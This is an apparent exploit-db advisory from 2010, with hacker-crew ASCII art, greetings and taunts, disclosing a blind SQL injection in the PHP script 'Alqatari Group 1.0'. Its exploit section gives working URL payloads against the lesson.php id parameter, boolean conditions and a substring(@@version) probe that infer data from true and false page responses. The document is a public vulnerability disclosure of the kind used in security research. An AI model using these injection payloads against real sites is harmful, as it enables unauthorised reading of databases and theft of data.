Alqatari Group 1.0 – Blind SQL Injection

  • 作者: Red-D3v1L
    日期: 2010-02-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11416/
  • +===================================================================================+
    ./SEC-R1Z _ __ __ _ _ ___ _ _ _ _ ___ _ _ _ _
    / /_ _ _ _ / _ _\/ _ _ /\\< |/_ _ _ _ /
    \ \_ _ _ _//___ // __||) / || / /
     \_ _ _ _//___ //| __ ||/||/ /
    _______\\_ _ \\2_0_1_0 |\|| / /____
    /_ _ _ _ _\ _ _ _/\ _ _ _ /|__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
    +===================================================================================+
     
    [?] ~ Note : sEc-r1z CrEw# r0x !
    ==============================================================================
    [?] Alqatari group Version 1.0 Blind SQL Injection Vulnerability
    ==============================================================================
    [?] My home:[ http://sec-r1z.com ]
    [?] For Ask:[r-d@passport.com]
    [?] Script: [ Alqatari group Version 1.0 ]
    [?] Language: [ PHP ]
    [?] Founder:[ Red-D3v1L ]
    [?] Gr44tz to:[ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
    [?] n00bz : [Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ..]
    ########################################################################
     
    ===[ Exploit SQL Blind ]===
    
     
    [»]Exploit : 
    
    http://server/lesson.php?id=246%20and%201=1 << this true
    
    http://server/lesson.php?id=246%20and%201=2 << this faulse
    
    
    http://server/lesson.php?id=246%20and%20substring%28@@version,1,1%29=5 << this true
    
    http://server/lesson.php?id=246%20and%20substring%28@@version,1,1%29=4 << this faulse
    
    
    ./Greetz For All my Frindes 
    
    
     
    ==============================================================================
     
    #sEc-r1z.com Str1kEz y0u !